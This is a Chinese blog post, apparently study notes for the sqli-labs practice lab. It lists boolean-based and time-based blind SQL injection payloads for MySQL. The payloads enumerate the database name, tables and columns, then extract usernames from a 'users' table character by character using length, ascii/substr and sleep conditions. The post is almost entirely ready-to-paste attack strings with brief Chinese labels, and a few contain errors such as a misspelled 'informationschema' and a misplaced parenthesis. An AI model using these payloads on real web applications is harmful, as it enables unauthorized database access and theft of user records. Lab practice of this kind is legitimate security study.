布尔盲注和时间注入语法

坠水

已于 2022-05-05 21:00:29 修改

阅读量497

点赞数

文章标签： less 数据库 p2p

于 2022-02-26 15:39:05 首次发布

本文链接：https://blog.csdn.net/m0_56107268/article/details/123150914

版权

布尔盲注

1 ' or length(database()) >4 # 判断数据库长度
1' or length(database())>4 #
利用二分法来确定数据库名称 1 ' or left(database(),1)='s' #
利用ascii码来确定 1' or ascii(substr((select database()),1,1)) > 100 #
1' or (select(length(table_name)) from informationschema.tables where table_schema ='database()' limit 0,1) > 8

1' or (select count(*) from information_schema.tables where table_schema='database()')=4# 判断有多少表

1' or length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>1 # 判断表的长度

1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1,1))=101# 判断表的名字

1' or (select count(*) from information_schema.columns where table_schema="security" and table_name="users")=3# 判断表中的字段数

1' or length((select column_name from information_schema.columns where table_name="users" and table_schema="security" limit 0,1))=2# 判断字段的长度

1' or ascii(substr((select column_name from information_schema.columns where table_name="users" and table_schema="security" limit 0,1),1,1))=1# 判断字段的名字

1' or (select count(*) from users)=13# 判断表中的用户的个数

1' or length((select username from users limit 0,1))=num# 用户的长度

1' or ascii(substr((select username from users limit 0,1),1,1))=68# 用户的值

时间盲注

1" and if(length(database())>4,sleep(2),null) --+ 判断数据库长度

1" and if(ascii(substring(database(),1,1)>100),sleep(3),null) --+ 判断数据库名字

1" and if((select count(*) from information_schema.tables where table_schema='security')=4 ,sleep(3),null) --+ 判断有多少张表

1" and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(3),null) --+ 判断表的长度

1" and if(ascii(substring((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(3),null)--+ 判断表的名字

1" and if((select count(*) from information_schema.columns where table_schema="security" and table_name="users")=3,sleep(3),null) --+ 判断字段数

1" and if(length((select column_name from information_schema.columns where table_name="users" and table_schema="security" limit 0,1))=2,sleep(3),null) --+ 判断字段长度

1" and if(ascii(substring((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1))>100,sleep(3),null) --+ 判断字段名

1" and if((select count(*) from users)=13,sleep(3),null) --+ 判断用户个数

1" and if(length((select username from users limit 0,1))=num,sleep(3),null) --+ 判断用户的长度

1" and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(3),null) --+ 判断用户的值

坠水

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
布尔盲注和时间注入语法

布尔盲注1 ' or length(database()) >4 # 判断数据库长度1' or length(database())>4 #利用二分法来确定数据库名称 1 ' or left(database(),1)='s' #利用ascii码来确定 1' or ascii(substr((select database()),1,1)) > 100 #1’ or (select(length(table_name)) from informat...
复制链接

扫一扫